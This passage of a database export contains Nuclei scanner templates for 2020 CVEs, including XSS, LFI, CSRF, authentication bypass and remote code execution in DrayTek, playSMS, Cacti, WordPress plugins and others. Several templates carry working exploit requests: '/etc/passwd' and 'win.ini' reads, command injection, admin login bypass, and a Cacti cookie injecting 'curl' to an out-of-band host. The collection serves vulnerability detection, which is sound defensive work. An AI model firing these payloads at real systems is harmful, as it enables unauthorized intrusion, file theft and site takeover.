"time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308241" }, "name": "CVE-2020-8512.yaml", "content": "id: CVE-2020-8512\n\ninfo:\n name: IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting\n author: pdteam,dwisiswant0\n severity: medium\n description: IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter.\n impact: |\n 
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.\n remediation: |\n Upgrade to a patched version of IceWarp WebMail Server (>=11.4.4.2) or apply the vendor-provided patch to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/47988\n - https://twitter.com/sagaryadav8742/status/1275170967527006208\n - https://cxsecurity.com/issue/WLB-2020010205\n - https://packetstormsecurity.com/files/156103/IceWarp-WebMail-11.4.4.1-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8512\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-8512\n cwe-id: CWE-79\n epss-score: 0.00692\n epss-percentile: 0.79726\n cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: icewarp\n product: icewarp_server\n shodan-query: title:\"icewarp\"\n tags: cve,cve2020,edb,packetstorm,xss,icewarp\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"IceWarp\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220144c263851998fa91377497074b757f9895d6aeea41149f1d411839b7f4a5d71022100f6ac53a3009610178242836e265a702b8c72cedd972b57d420d924c438483336:922c64590222798bb761d5b6d8e72950", "hash": "174117fe163cb036513aac00a59e9fc2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308242" }, "name": "CVE-2020-8515.yaml", "content": "id: CVE-2020-8515\n\ninfo:\n name: DrayTek - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 
1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected router, leading to complete compromise of the device and potential unauthorized access to the network.\n remediation: This issue has been fixed in Vigor3900/2960/300B v1.5.1.\n reference:\n - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)\n - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8515\n - https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html\n - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-%28cve-2020-8515%29/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-8515\n cwe-id: CWE-78\n epss-score: 0.97079\n epss-percentile: 0.99754\n cpe: cpe:2.3:o:draytek:vigor2960_firmware:1.3.1:beta:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: draytek\n product: vigor2960_firmware\n tags: cve,cve2020,rce,kev,draytek\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/mainfunction.cgi HTTP/1.1\n Host: {{Hostname}}\n\n action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206d0846edf7e8e6118bd01670c01706ad026f58b9b53ef7cd70a6606c4c693f6d02206b183f00c8643042b064c49c928b48fd987a03476c663cd827dd563793cf11ef:922c64590222798bb761d5b6d8e72950", "hash": "45661675cba96f395d0e085ae2f3ed9c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf308243" }, "name": "CVE-2020-8615.yaml", "content": "id: CVE-2020-8615\n\ninfo:\n name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery\n author: r3Y3r53\n severity: medium\n description: |\n A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).\n remediation: update to v.1.5.3\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8615\n - https://wpscan.com/vulnerability/10058\n - http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html\n - https://wpvulndb.com/vulnerabilities/10058\n - https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N\n cvss-score: 6.5\n cve-id: CVE-2020-8615\n cwe-id: CWE-352\n epss-score: 0.00632\n epss-percentile: 0.78607\n cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: themeum\n product: tutor_lms\n framework: wordpress\n publicwww-query: /wp-content/plugins/tutor/\n tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum\nvariables:\n user: \"{{rand_base(6)}}\"\n pass: \"{{rand_base(8)}}\"\n email: \"{{randstr}}@{{rand_base(5)}}.com\"\n firstname: \"{{rand_base(5)}}\"\n lastname: \"{{rand_base(5)}}\"\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(content_type_2, \"application/json\")'\n - 'contains(body_2, \"success\") && contains(body_2, \"true\") && contains(body_2, \"Instructor has been added successfully\")'\n - 'status_code_2 == 200'\n condition: and\n# digest: 4b0a00483046022100de6de457bb118ab6c4d6b4b82ab6c8ff87768dddd14a369a687a3192e06b4e57022100b77038f1401cb94826ab4e530bebe15addac7087506d0fb7356d04f7c66468f8:922c64590222798bb761d5b6d8e72950", "hash": "391392127f66b121fd1bfbc3f7ac2dc8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308244" }, "name": "CVE-2020-8641.yaml", "content": "id: CVE-2020-8641\n\ninfo:\n name: Lotus Core CMS 1.0.1 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Lotus Core CMS 1.0.1 allows authenticated local file inclusion of .php files via directory traversal in the index.php page_slug parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n remediation: |\n Apply the latest security patch or update to Lotus Core CMS 1.0.1 to fix the LFI vulnerability.\n reference:\n - https://cxsecurity.com/issue/WLB-2020010234\n - https://www.exploit-db.com/exploits/47985\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8641\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-8641\n cwe-id: CWE-22\n epss-score: 0.0071\n epss-percentile: 0.80028\n cpe: cpe:2.3:a:lotus_core_cms_project:lotus_core_cms:1.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 
1\n vendor: lotus_core_cms_project\n product: lotus_core_cms\n tags: cve,cve2020,lfi,lotus,cms,edb,lotus_core_cms_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00'\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d1ececd05341a5a1bef5c9da1c0dfda7428c31f46f8abe790aa333141dc7004e022100c929cd89b883f1951676f34e2109adfac476702f5883f91216e42df3df792754:922c64590222798bb761d5b6d8e72950", "hash": "b17a407355ec5bb70046886b570728cc", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308245" }, "name": "CVE-2020-8644.yaml", "content": "id: CVE-2020-8644\n\ninfo:\n name: playSMS <1.4.3 - Remote Code Execution\n author: dbrwsky\n severity: critical\n description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.\n remediation: |\n Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability.\n reference:\n - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/\n - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8644\n - http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html\n - https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-8644\n cwe-id: CWE-94\n epss-score: 0.96028\n epss-percentile: 0.99356\n cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: playsms\n product: playsms\n tags: 
cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce\n\nhttp:\n - raw:\n - |\n GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n - |\n POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n Content-Type: application/x-www-form-urlencoded\n\n X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '4468-0202-EVC'\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: xpath\n name: csrf\n internal: true\n xpath:\n - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input\n attribute: value\n part: body\n# digest: 4a0a00473045022100de0fd4f3f3ad0fb96410bfb6090044c9b207a545e58487ddd0511778356e78c702202963c19d8dd8b9609b66bad92c7de0ffbe0fb371c60ada6d7cc14bdf04c0a9de:922c64590222798bb761d5b6d8e72950", "hash": "8b59f3d7256132f7f9fc824bb425d301", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308246" }, "name": "CVE-2020-8654.yaml", "content": "id: CVE-2020-8654\n\ninfo:\n name: EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution\n author: praetorian-thendrickson\n severity: high\n description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. 
See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465.\n impact: |\n Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary SQL queries or remote code on the affected system.\n remediation: |\n Upgrade to a patched version of EyesOfNetwork or apply the necessary security patches to mitigate the vulnerabilities.\n reference:\n - https://github.com/h4knet/eonrce\n - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb\n - https://github.com/EyesOfNetworkCommunity/eonweb/issues/50\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8654\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-8654\n cwe-id: CWE-78\n epss-score: 0.04987\n epss-percentile: 0.92656\n cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: eyesofnetwork\n product: eyesofnetwork\n tags: cve2020,cve,cisa,eyesofnetwork,rce,authenticated,msf,sqli\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/css/eonweb.css\"\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - compare_versions(version, '< 5.4', '>= 5.1')\n\n - type: word\n part: body\n words:\n - \"EyesOfNetwork\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: version\n group: 1\n regex:\n - \"# VERSION : ([0-9.]+)\"\n internal: true\n part: body\n# digest: 4a0a0047304502207ebd6b469ac0bd67dd7bc462fa62ef88bde2a9cb294df7a70aecebfd8f51f913022100be00ea371f5c1dbe5dd0833ee69f20b921c315d38f0cca3ba9d8e3af3b938674:922c64590222798bb761d5b6d8e72950", "hash": "11adae59c2d814b1fc7377410596795f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308247" }, "name": "CVE-2020-8771.yaml", "content": "id: CVE-2020-8771\n\ninfo:\n name: WordPress Time Capsule < 1.21.16 - Authentication Bypass\n author: princechaddha\n 
severity: critical\n description: WordPress Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to the WordPress Time Capsule plugin.\n remediation: |\n Update WordPress Time Capsule plugin to version 1.21.16 or later.\n reference:\n - https://github.com/SECFORCE/WPTimeCapsulePOC\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8771\n - https://wpvulndb.com/vulnerabilities/10010\n - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-8771\n cwe-id: CWE-287\n epss-score: 0.07621\n epss-percentile: 0.93504\n cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: wptimecapsule\n product: wp_time_capsule\n framework: wordpress\n tags: cve,cve2020,wordpress,wp-plugin,wptimecapsule\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Connection: close\n Accept: */*\n\n IWP_JSON_PREFIX\n - |\n GET /wp-admin/index.php HTTP/1.1\n Host: {{Hostname}}\n Connection: close\n Accept: */*\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '
    '\n - \"

    Dashboard

    \"\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/html'\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - \"wordpress_[a-z0-9]+=([A-Za-z0-9%]+)\"\n part: header\n# digest: 490a0046304402204b41fb153964f98c107c172d7a2c74f48970b835829d159402ad436a5e80db8b02203cc1966c1359d4d12a32c63ed49512b83bd1529496236446f0e2ddcaa41eb7d2:922c64590222798bb761d5b6d8e72950", "hash": "9ded79c19c2654f86fabe0e807d356db", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308248" }, "name": "CVE-2020-8772.yaml", "content": "id: CVE-2020-8772\n\ninfo:\n name: WordPress InfiniteWP <1.9.4.5 - Authorization Bypass\n author: princechaddha,scent2d\n severity: critical\n description: |\n WordPress InfiniteWP plugin before 1.9.4.5 for WordPress contains an authorization bypass vulnerability via a missing authorization check in iwp_mmb_set_request in init.php. An attacker who knows the username of an administrator can log in, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can gain unauthorized administrative access to the WordPress site.\n remediation: Upgrade to InfiniteWP 1.9.4.5 or higher.\n reference:\n - https://wpscan.com/vulnerability/10011\n - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/\n - https://wpvulndb.com/vulnerabilities/10011\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8772\n - https://github.com/ChoiSG/vwp\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-8772\n cwe-id: CWE-862\n epss-score: 0.96607\n epss-percentile: 0.99546\n cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: revmakx\n product: infinitewp_client\n framework: wordpress\n tags: cve,cve2020,wpscan,wordpress,wp-plugin,wp,infinitewp,auth-bypass,revmakx\n\nhttp:\n - raw:\n 
- |\n GET /?author=1 HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n Accept-Language: en-US,en;q=0.9\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Content-Type: application/x-www-form-urlencoded\n\n _IWP_JSON_PREFIX_{{base64(\"{\\\"iwp_action\\\":\\\"add_site\\\",\\\"params\\\":{\\\"username\\\":\\\"{{username}}\\\"}}\")}}\n\n host-redirects: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"wordpress_logged_in\"\n\n - type: word\n part: body\n words:\n - \"\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: username\n group: 1\n regex:\n - 'Author:(?:[A-Za-z0-9 -\\_=\"]+)?([A-Za-z0-9]+)<\\/span>'\n internal: true\n part: body\n\n - type: regex\n name: username\n group: 1\n regex:\n - 'ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/'\n internal: true\n part: header\n# digest: 490a0046304402203291fcf479be6ac8ef870d1f4d03c92df6410ee75121d38addd0c9377d8f40f7022020886d69171d32958ad6b8f1d435f68f1521494a7169dedcee8a8830052aa695:922c64590222798bb761d5b6d8e72950", "hash": "0100d718eafe304863c523a7cec2e29b", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308249" }, "name": "CVE-2020-8813.yaml", "content": "id: CVE-2020-8813\n\ninfo:\n name: Cacti v1.2.8 - Remote Code Execution\n author: gy741\n severity: high\n description: Cacti v1.2.8 is susceptible to remote code execution. 
This vulnerability could be exploited without authentication if \"Guest Realtime Graphs\" privileges are enabled.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade to a patched version of Cacti v1.2.9 or later to mitigate this vulnerability.\n reference:\n - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/\n - https://github.com/Cacti/cacti/releases\n - https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129\n - https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8813\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-8813\n cwe-id: CWE-78\n epss-score: 0.95033\n epss-percentile: 0.9913\n cpe: cpe:2.3:a:cacti:cacti:1.2.8:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cacti\n product: cacti\n tags: cve2020,cve,cacti,rce,oast\n\nhttp:\n - raw:\n - |\n GET /graph_realtime.php?action=init HTTP/1.1\n Host: {{Hostname}}\n Cookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 4a0a0047304502204ec01dfe89f1f9796f53b43c3f8f9bfff0db4ea3e3eb7da3df8e6f4a15c93004022100a3827d38bc0be92d24eef29752497f720909d1d144850428accdd33dc2a798e8:922c64590222798bb761d5b6d8e72950", "hash": "0be36e513a193b58ace2b5c32beb7c07", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30824a" }, "name": "CVE-2020-8982.yaml", "content": "id: CVE-2020-8982\n\ninfo:\n name: Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read\n author: dwisiswant0\n severity: high\n description: Citrix ShareFile StorageZones (aka storage zones) Controller versions through at 
least 5.10.x are susceptible to an unauthenticated arbitrary file read vulnerability.\n impact: |\n An attacker can read arbitrary files on the affected system, potentially leading to unauthorized access to sensitive information.\n remediation: |\n Upgrade Citrix ShareFile StorageZones to version 5.11 or higher to mitigate the vulnerability.\n reference:\n - https://support.citrix.com/article/CTX269106\n - https://drive.google.com/file/d/1Izd5MF_HHuq8YSwAyJLBErWL_nbe6f9v/view\n - https://www.linkedin.com/posts/jonas-hansen-2a2606b_citrix-sharefile-storage-zones-controller-activity-6663432907455025152-8_w6/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8982\n - https://github.com/0xT11/CVE-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-8982\n cwe-id: CWE-22\n epss-score: 0.76583\n epss-percentile: 0.98117\n cpe: cpe:2.3:a:citrix:sharefile_storagezones_controller:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: citrix\n product: sharefile_storagezones_controller\n tags: cve2020,cve,citrix,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/XmlPeek.aspx?dt=\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\Windows\\\\\\\\win.ini&x=/validate.ashx?requri\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204412ce229c5877288e6faa77220767561a5fca4b8ab2566f23e2d7102706e67b02200cc521198e9c54a98f3bbaaba12c87827328af30704210e8eb388a6a2df98f2a:922c64590222798bb761d5b6d8e72950", "hash": "47f6ef4f313d669eab423bff3384684b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30824b" }, "name": "CVE-2020-9036.yaml", "content": "id: CVE-2020-9036\n\ninfo:\n name: Jeedom <=4.0.38 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Jeedom through 4.0.38 contains a 
cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Jeedom to version 4.0.39 or later to mitigate this vulnerability.\n reference:\n - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9036\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/my3ker/my3ker-cve-workshop\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-9036\n cwe-id: CWE-79\n epss-score: 0.00113\n epss-percentile: 0.43845\n cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jeedom\n product: jeedom\n tags: cve,cve2020,xss,jeedom\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a2b80e81f9efe58be8ec0d3d891a2338f141a0fe35e0a84de0e7223200f8fdb3022100fa273979e8c86cdf5acb48a0e6efd5b42d10962dcd2b82e270dd8ca259d39c79:922c64590222798bb761d5b6d8e72950", "hash": "723004824e24637193781a8faa34c94b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30824c" }, "name": "CVE-2020-9043.yaml", "content": "id: CVE-2020-9043\n\ninfo:\n name: WordPress wpCentral <1.5.1 - Information Disclosure\n author: scent2d\n severity: high\n description: |\n WordPress wpCentral plugin before 1.5.1 is susceptible to information 
disclosure. An attacker can access the connection key for WordPress Admin account and thus potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the wpCentral plugin.\n remediation: |\n Update the wpCentral plugin to version 1.5.1 or later to fix the information disclosure vulnerability.\n reference:\n - https://wpscan.com/vulnerability/10074\n - https://www.wordfence.com/blog/2020/02/vulnerability-in-wpcentral-plugin-leads-to-privilege-escalation/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9043\n - https://wordpress.org/plugins/wp-central/#developers\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9043\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-9043\n cwe-id: CWE-200\n epss-score: 0.04173\n epss-percentile: 0.91333\n cpe: cpe:2.3:a:wpcentral:wpcentral:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: wpcentral\n product: wpcentral\n framework: wordpress\n tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1\n Host: {{Hostname}}\n\n host-redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - \"contains(header_4, 'text/html')\"\n - \"status_code_4 == 200\"\n - \"contains(body_4, 'wpCentral Connection Key')\"\n - contains(body_4, \"pagenow = \\'dashboard\\'\")\n condition: and\n\n extractors:\n - type: regex\n name: authkey\n group: 1\n regex:\n - 
'style=\"word-wrap:break-word;\">([a-z0-9]+)'\n internal: true\n part: body\n\n - type: regex\n name: nonce\n group: 1\n regex:\n - '_wpnonce=([0-9a-z]+)'\n internal: true\n part: body\n# digest: 490a0046304402204bffb24bf04e56aff7c5c70589b7ecbf9c04db1c030e793573251a9f104c2e1d02207a1cb6691600aaceae61e38e6ec3a9e54d43209ae9a6a254ab763e9a2b031198:922c64590222798bb761d5b6d8e72950", "hash": "6c589cc7aaed280d3586ea72cde26196", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30824d" }, "name": "CVE-2020-9047.yaml", "content": "id: CVE-2020-9047\n\ninfo:\n name: exacqVision Web Service - Remote Code Execution\n author: dwisiswant0\n severity: high\n description: |\n exacqVision Web Service is susceptible to remote code execution which could allow the execution of unauthorized code or operating system commands on systems running exacqVision Web Service versions 20.06.3.0 and prior and exacqVision Enterprise Manager versions 20.06.4.0 and prior. An attacker with administrative privileges could potentially download and run a malicious executable that could allow OS command injection on the system.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patch or update provided by the vendor to fix the vulnerability.\n reference:\n - https://github.com/norrismw/CVE-2020-9047\n - https://www.johnsoncontrols.com/cyber-solutions/security-advisories\n - https://www.us-cert.gov/ics/advisories/ICSA-20-170-01\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9047\n - https://github.com/hectorgie/PoC-in-GitHub\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2020-9047\n cwe-id: CWE-347\n epss-score: 0.00782\n epss-percentile: 0.81009\n cpe: cpe:2.3:a:johnsoncontrols:exacqvision_enterprise_manager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: johnsoncontrols\n 
